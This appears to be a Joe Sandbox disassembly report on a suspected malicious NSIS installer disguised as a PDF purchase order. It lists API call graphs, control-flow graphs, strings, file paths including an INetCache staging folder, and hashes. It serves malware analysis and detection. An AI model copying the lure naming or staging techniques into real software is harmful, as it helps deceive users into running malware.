4071->4073 4072->3873 4073->4071 4075 4038fa 4074->4075 4076 405f56 RegQueryValueExW 4074->4076 4075->3869 4075->3870 4078 405f77 RegCloseKey 4076->4078 4078->4075 4079->3875 4088 404165 4080->4088 4082 4052aa 4086 4052d1 4082->4086 4091 401389 4082->4091 4083 404165 SendMessageW 4084 4052e3 OleUninitialize 4083->4084 4084->3906 4086->4083 4087->4068 4089 40417d 4088->4089 4090 40416e SendMessageW 4088->4090 4089->4082 4090->4089 4093 401390 4091->4093 4092 4013fe 4092->4082 4093->4092 4094 4013cb MulDiv SendMessageW 4093->4094 4094->4093 4095->3919 4097 405ad1 4096->4097 4098 405ae3 4096->4098 4097->4098 4099 405ade CharNextW 4097->4099 4100 405b07 4098->4100 4101 405a36 CharNextW 4098->4101 4099->4100 4100->3922 4100->3923 4101->4098 4103 4063b9 4102->4103 4104 4063ae FindClose 4102->4104 4103->3924 4104->4103 4106 403817 4105->4106 4107 4037e1 4106->4107 4108 40381c FreeLibrary GlobalFree 4106->4108 4109 405846 4107->4109 4108->4107 4108->4108 4110 405b11 18 API calls 4109->4110 4111 405866 4110->4111 4112 405885 4111->4112 4113 40586e DeleteFileW 4111->4113 4115 4059b0 4112->4115 4149 406055 lstrcpynW 4112->4149 4114 4035f6 OleUninitialize 4113->4114 4114->3758 4114->3759 4115->4114 4120 406398 2 API calls 4115->4120 4117 4058ab 4118 4058b1 lstrcatW 4117->4118 4119 4058be 4117->4119 4121 4058c4 4118->4121 4122 405a55 2 API calls 4119->4122 4125 4059ca 4120->4125 4123 4058d4 lstrcatW 4121->4123 4124 4058ca 4121->4124 4122->4121 4126 4058df lstrlenW FindFirstFileW 4123->4126 4124->4123 4124->4126 4125->4114 4127 4059ce 4125->4127 4128 405901 4126->4128 4129 4059a5 4126->4129 4130 405a09 3 API calls 4127->4130 4132 405988 FindNextFileW 4128->4132 4142 405846 62 API calls 4128->4142 4144 4051b4 25 API calls 4128->4144 4146 4051b4 25 API calls 4128->4146 4148 405ef6 38 API calls 4128->4148 4150 406055 lstrcpynW 4128->4150 4151 4057fe 4128->4151 4129->4115 4131 4059d4 4130->4131 4133 4057fe 5 API calls 4131->4133 4132->4128 4136 40599e FindClose 4132->4136 4135 4059e0 4133->4135 4137 4059e4 4135->4137 4138 4059fa 4135->4138 4136->4129 4137->4114 4141 4051b4 25 API calls 4137->4141 4139 4051b4 25 API calls 4138->4139 4139->4114 4143 4059f1 4141->4143 4142->4128 4145 405ef6 38 API calls 4143->4145 4144->4132 4147 4059f8 4145->4147 4146->4128 4147->4114 4148->4128 4149->4117 4150->4128 4159 405c05 GetFileAttributesW 4151->4159 4154 40582b 4154->4128 4155 405821 DeleteFileW 4157 405827 4155->4157 4156 405819 RemoveDirectoryW 4156->4157 4157->4154 4158 405837 SetFileAttributesW 4157->4158 4158->4154 4160 40580a 4159->4160 4161 405c17 SetFileAttributesW 4159->4161 4160->4154 4160->4155 4160->4156 4161->4160 4162->3966 4163->3966 4164->3959 4166 405dd2 GetShortPathNameW 4165->4166 4167 405dac 4165->4167 4169 405ef1 4166->4169 4170 405de7 4166->4170 4192 405c2a GetFileAttributesW CreateFileW 4167->4192 4169->3976 4170->4169 4172 405def wsprintfA 4170->4172 4171 405db6 CloseHandle GetShortPathNameW 4171->4169 4173 405dca 4171->4173 4174 406077 18 API calls 4172->4174 4173->4166 4173->4169 4175 405e17 4174->4175 4193 405c2a GetFileAttributesW CreateFileW 4175->4193 4177 405e24 4177->4169 4178 405e33 GetFileSize GlobalAlloc 4177->4178 4179 405e55 4178->4179 4180 405eea CloseHandle 4178->4180 4181 405cad ReadFile 4179->4181 4180->4169 4182 405e5d 4181->4182 4182->4180 4194 405b8f lstrlenA 4182->4194 4185 405e74 lstrcpyA 4188 405e96 4185->4188 4186 405e88 4187 405b8f 4 API calls 4186->4187 4187->4188 4189 405ecd SetFilePointer 4188->4189 4190 405cdc WriteFile 4189->4190 4191 405ee3 GlobalFree 4190->4191 4191->4180 4192->4171 4193->4177 4195 405bd0 lstrlenA 4194->4195 4196 405ba9 lstrcmpiA 4195->4196 4198 405bd8 4195->4198 4197 405bc7 CharNextA 4196->4197 4196->4198 4197->4195 4198->4185 4198->4186 5261 100010e1 5264 10001111 5261->5264 5262 100011d8 GlobalFree 5263 100012ba 2 API calls 5263->5264 5264->5262 5264->5263 5265 100011d3 5264->5265 5266 10001272 2 API calls 5264->5266 5267 10001164 GlobalAlloc 5264->5267 5268 100011f8 GlobalFree 5264->5268 5269 100011c4 GlobalFree 5264->5269 5270 100012e1 lstrcpyW 5264->5270 5265->5262 5266->5269 5267->5264 5268->5264 5269->5264 5270->5264 5271 401ca3 5272 402ba2 18 API calls 5271->5272 5273 401ca9 IsWindow 5272->5273 5274 401a05 5273->5274 5275 402a27 SendMessageW 5276 402a41 InvalidateRect 5275->5276 5277 402a4c 5275->5277 5276->5277 4566 405128 4567 405138 4566->4567 4568 40514c 4566->4568 4570 405195 4567->4570 4571 40513e 4567->4571 4569 405154 IsWindowVisible 4568->4569 4578 405174 4568->4578 4569->4570 4573 405161 4569->4573 4574 40519a CallWindowProcW 4570->4574 4572 404165 SendMessageW 4571->4572 4575 405148 4572->4575 4580 404a7e SendMessageW 4573->4580 4574->4575 4578->4574 4585 404afe 4578->4585 4581 404aa1 GetMessagePos ScreenToClient SendMessageW 4580->4581 4582 404add SendMessageW 4580->4582 4583 404ad5 4581->4583 4584 404ada 4581->4584 4582->4583 4583->4578 4584->4582 4594 406055 lstrcpynW 4585->4594 4587 404b11 4595 405f9c wsprintfW 4587->4595 4589 404b1b 4590 40140b 2 API calls 4589->4590 4591 404b24 4590->4591 4596 406055 lstrcpynW 4591->4596 4593 404b2b 4593->4570 4594->4587 4595->4589 4596->4593 4597 40242a 4608 402cc9 4597->4608 4599 402434 4600 402bbf 18 API calls 4599->4600 4601 40243d 4600->4601 4602 402448 RegQueryValueExW 4601->4602 4603 40281e 4601->4603 4604 402468 4602->4604 4607 40246e RegCloseKey 4602->4607 4604->4607 4612 405f9c wsprintfW 4604->4612 4607->4603 4609 402bbf 18 API calls 4608->4609 4610 402ce2 4609->4610 4611 402cf0 RegOpenKeyExW 4610->4611 4611->4599 4612->4607 5278 40422d lstrcpynW lstrlenW 5279 40172d 5280 402bbf 18 API calls 5279->5280 5281 401734 SearchPathW 5280->5281 5282 40174f 5281->5282 4613 404b30 GetDlgItem GetDlgItem 4614 404b82 7 API calls 4613->4614 4617 404d9b 4613->4617 4615 404c25 DeleteObject 4614->4615 4616 404c18 SendMessageW 4614->4616 4618 404c2e 4615->4618 4616->4615 4623 404e60 4617->4623 4626 404e7f 4617->4626 4630 404dfb 4617->4630 4619 404c65 4618->4619 4622 406077 18 API calls 4618->4622 4620 404119 19 API calls 4619->4620 4624 404c79 4620->4624 4621 404f2b 4627 404f35 SendMessageW 4621->4627 4628 404f3d 4621->4628 4629 404c47 SendMessageW SendMessageW 4622->4629 4623->4626 4635 404e71 SendMessageW 4623->4635 4632 404119 19 API calls 4624->4632 4625 405113 4634 404180 8 API calls 4625->4634 4626->4621 4626->4625 4633 404ed8 SendMessageW 4626->4633 4627->4628 4636 404f56 4628->4636 4637 404f4f ImageList_Destroy 4628->4637 4644 404f66 4628->4644 4629->4618 4631 404a7e 5 API calls 4630->4631 4649 404e0c 4631->4649 4650 404c87 4632->4650 4633->4625 4639 404eed SendMessageW 4633->4639 4640 405121 4634->4640 4635->4626 4641 404f5f GlobalFree 4636->4641 4636->4644 4637->4636 4638 4050d5 4638->4625 4645 4050e7 ShowWindow GetDlgItem ShowWindow 4638->4645 4643 404f00 4639->4643 4641->4644 4642 404d5c GetWindowLongW SetWindowLongW 4646 404d75 4642->4646 4654 404f11 SendMessageW 4643->4654 4644->4638 4659 404afe 4 API calls 4644->4659 4662 404fa1 4644->4662 4645->4625 4647 404d93 4646->4647 4648 404d7b ShowWindow 4646->4648 4669 40414e SendMessageW 4647->4669 4668 40414e SendMessageW 4648->4668 4649->4623 4650->4642 4653 404cd7 SendMessageW 4650->4653 4655 404d56 4650->4655 4657 404d13 SendMessageW 4650->4657 4658 404d24 SendMessageW 4650->4658 4653->4650 4654->4621 4655->4642 4655->4646 4656 404d8e 4656->4625 4657->4650 4658->4650 4659->4662 4660 4050ab InvalidateRect 4660->4638 4661 4050c1 4660->4661 4670 404a39 4661->4670 4663 404fcf SendMessageW 4662->4663 4664 404fe5 4662->4664 4663->4664 4664->4660 4665 405046 4664->4665 4667 405059 SendMessageW SendMessageW 4664->4667 4665->4667 4667->4664 4668->4656 4669->4617 4673 404970 4670->4673 4672 404a4e 4672->4638 4674 404989 4673->4674 4675 406077 18 API calls 4674->4675 4676 4049ed 4675->4676 4677 406077 18 API calls 4676->4677 4678 4049f8 4677->4678 4679 406077 18 API calls 4678->4679 4680 404a0e lstrlenW wsprintfW SetDlgItemTextW 4679->4680 4680->4672 5283 4045b4 5284 4045e0 5283->5284 5285 4045f1 5283->5285 5344 40577e GetDlgItemTextW 5284->5344 5286 4045fd GetDlgItem 5285->5286 5289 40465c 5285->5289 5288 404611 5286->5288 5293 404625 SetWindowTextW 5288->5293 5296 405ab4 4 API calls 5288->5296 5290 404740 5289->5290 5298 406077 18 API calls 5289->5298 5342 4048ef 5289->5342 5290->5342 5346 40577e GetDlgItemTextW 5290->5346 5291 4045eb 5292 4062e9 5 API calls 5291->5292 5292->5285 5297 404119 19 API calls 5293->5297 5295 404180 8 API calls 5300 404903 5295->5300 5301 40461b 5296->5301 5302 404641 5297->5302 5303 4046d0 SHBrowseForFolderW 5298->5303 5299 404770 5304 405b11 18 API calls 5299->5304 5301->5293 5308 405a09 3 API calls 5301->5308 5305 404119 19 API calls 5302->5305 5303->5290 5306 4046e8 CoTaskMemFree 5303->5306 5307 404776 5304->5307 5309 40464f 5305->5309 5310 405a09 3 API calls 5306->5310 5347 406055 lstrcpynW 5307->5347 5308->5293 5345 40414e SendMessageW 5309->5345 5318 4046f5 5310->5318 5313 404655 5317 40642b 5 API calls 5313->5317 5314 40472c SetDlgItemTextW 5314->5290 5315 40478d 5316 40642b 5 API calls 5315->5316 5325 404794 5316->5325 5317->5289 5318->5314 5319 406077 18 API calls 5318->5319 5320 404714 lstrcmpiW 5319->5320 5320->5314 5322 404725 lstrcatW 5320->5322 5321 4047d5 5348 406055 lstrcpynW 5321->5348 5322->5314 5324 4047dc 5326 405ab4 4 API calls 5324->5326 5325->5321 5330 405a55 2 API calls 5325->5330 5331 40482d 5325->5331 5327 4047e2 GetDiskFreeSpaceW 5326->5327 5329 404806 MulDiv 5327->5329 5327->5331 5329->5331 5330->5325 5332 40489e 5331->5332 5334 404a39 21 API calls 5331->5334 5333 4048c1 5332->5333 5335 40140b 2 API calls 5332->5335 5349 40413b EnableWindow 5333->5349 5336 40488b 5334->5336 5335->5333 5337 4048a0 SetDlgItemTextW 5336->5337 5338 404890 5336->5338 5337->5332 5340 404970 21 API calls 5338->5340 5340->5332 5341 4048dd 5341->5342 5350 404549 5341->5350 5342->5295 5344->5291 5345->5313 5346->5299 5347->5315 5348->5324 5349->5341 5351 404557 5350->5351 5352 40455c SendMessageW 5350->5352 5351->5352 5352->5342 5353 4027b4 5354 4027ba 5353->5354 5355 4027c2 FindClose 5354->5355 5356 402a4c 5354->5356 5355->5356 5357 4042b6 5358 4042ce 5357->5358 5362 4043e8 5357->5362 5363 404119 19 API calls 5358->5363 5359 404452 5360 404524 5359->5360 5361 40445c GetDlgItem 5359->5361 5367 404180 8 API calls 5360->5367 5364 404476 5361->5364 5368 4044e5 5361->5368 5362->5359 5362->5360 5365 404423 GetDlgItem SendMessageW 5362->5365 5366 404335 5363->5366 5364->5368 5372 40449c 6 API calls 5364->5372 5388 40413b EnableWindow 5365->5388 5370 404119 19 API calls 5366->5370 5371 40451f 5367->5371 5368->5360 5373 4044f7 5368->5373 5377 404342 CheckDlgButton 5370->5377 5372->5368 5374 40450d 5373->5374 5375 4044fd SendMessageW 5373->5375 5374->5371 5378 404513 SendMessageW 5374->5378 5375->5374 5376 40444d 5379 404549 SendMessageW 5376->5379 5386 40413b EnableWindow 5377->5386 5378->5371 5379->5359 5381 404360 GetDlgItem 5387 40414e SendMessageW 5381->5387 5383 404376 SendMessageW 5384 404393 GetSysColor 5383->5384 5385 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5383->5385 5384->5385 5385->5371 5386->5381 5387->5383 5388->5376 5389 401b37 5390 401b44 5389->5390 5391 401b88 5389->5391 5392 401bcd 5390->5392 5397 401b5b 5390->5397 5393 401bb2 GlobalAlloc 5391->5393 5394 401b8d 5391->5394 5396 406077 18 API calls 5392->5396 5404 402288 5392->5404 5395 406077 18 API calls 5393->5395 5394->5404 5410 406055 lstrcpynW 5394->5410 5395->5392 5398 402282 5396->5398 5408 406055 lstrcpynW 5397->5408 5402 40579a MessageBoxIndirectW 5398->5402 5401 401b9f GlobalFree 5401->5404 5402->5404 5403 401b6a 5409 406055 lstrcpynW 5403->5409 5406 401b79 5411 406055 lstrcpynW 5406->5411 5408->5403 5409->5406 5410->5401 5411->5404 5412 402537 5413 402562 5412->5413 5414 40254b 5412->5414 5416 402596 5413->5416 5417 402567 5413->5417 5415 402ba2 18 API calls 5414->5415 5424 402552 5415->5424 5418 402bbf 18 API calls 5416->5418 5419 402bbf 18 API calls 5417->5419 5420 40259d lstrlenW 5418->5420 5421 40256e WideCharToMultiByte lstrlenA 5419->5421 5420->5424 5421->5424 5422 4025ca 5423 4025e0 5422->5423 5425 405cdc WriteFile 5422->5425 5424->5422 5424->5423 5426 405d0b 5 API calls 5424->5426 5425->5423 5426->5422 5427 4014b8 5428 4014be 5427->5428 5429 401389 2 API calls 5428->5429 5430 4014c6 5429->5430 4709 4015b9 4710 402bbf 18 API calls 4709->4710 4711 4015c0 4710->4711 4712 405ab4 4 API calls 4711->4712 4724 4015c9 4712->4724 4713 401629 4714 40165b 4713->4714 4715 40162e 4713->4715 4719 401423 25 API calls 4714->4719 4717 401423 25 API calls 4715->4717 4716 405a36 CharNextW 4716->4724 4718 401635 4717->4718 4728 406055 lstrcpynW 4718->4728 4726 401653 4719->4726 4721 405700 2 API calls 4721->4724 4722 40571d 5 API calls 4722->4724 4723 401642 SetCurrentDirectoryW 4723->4726 4724->4713 4724->4716 4724->4721 4724->4722 4725 40160f GetFileAttributesW 4724->4725 4727 405683 4 API calls 4724->4727 4725->4724 4727->4724 4728->4723 5431 10002a7f 5432 10002a97 5431->5432 5433 1000158f 2 API calls 5432->5433 5434 10002ab2 5433->5434

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 32 403480-40348d call 405a36 31->32 33 4033c8-4033ce 31->33 53 403491-403497 32->53 54 40348f-403490 32->54 36 4033d0-4033d7 33->36 37 4033e8-403421 33->37 34->35 52 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->52 48 4035f1-403602 call 4037c4 OleUninitialize 35->48 49 403546-40354c 35->49 42 4033d9-4033dc 36->42 43 4033de 36->43 44 403423-403428 37->44 45 40343e-403478 37->45 42->37 42->43 43->37 44->45 50 40342a-403432 44->50 45->32 51 40347a-40347e 45->51 71 403728-40372e 48->71 72 403608-403618 call 40579a ExitProcess 48->72 56 4035e1-4035e8 call 40389e 49->56 57 403552-40355d call 405a36 49->57 59 403434-403437 50->59 60 403439 50->60 51->32 61 40349f-4034ad call 406055 51->61 52->35 52->48 53->24 55 40349d 53->55 54->53 63 4034b2 55->63 70 4035ed 56->70 73 4035ab-4035b5 57->73 74 40355f-403594 57->74 59->45 59->60 60->45 61->63 63->25 70->48 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 87 4035a3-4035a7 78->87 88 40359c-4035a1 78->88 79->80 81->48 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 87->78 92 4035a9 87->92 88->87 88->92 92->73 95->77 101 4037a5-4037a7 call 40140b 95->101 96->95 96->101 97->56 98->99 99->48 100 40365b-40365e 99->100 104 403660-403665 call 405683 100->104 105 403667 call 405700 100->105 101->77 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->48 134->122
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                            • GetVersion.KERNEL32 ref: 004032C8
                                                                                                            • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000), ref: 00403363
                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000020), ref: 0040338A
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                            • ExitProcess.KERNEL32 ref: 00403618
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 0040362B
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 0040363A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 00403645
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",00000000,?), ref: 00403651
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,0042AA28,00000001), ref: 004036DB
                                                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                            • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3586999533-1114614330
                                                                                                            • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                            • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                            • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                            • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
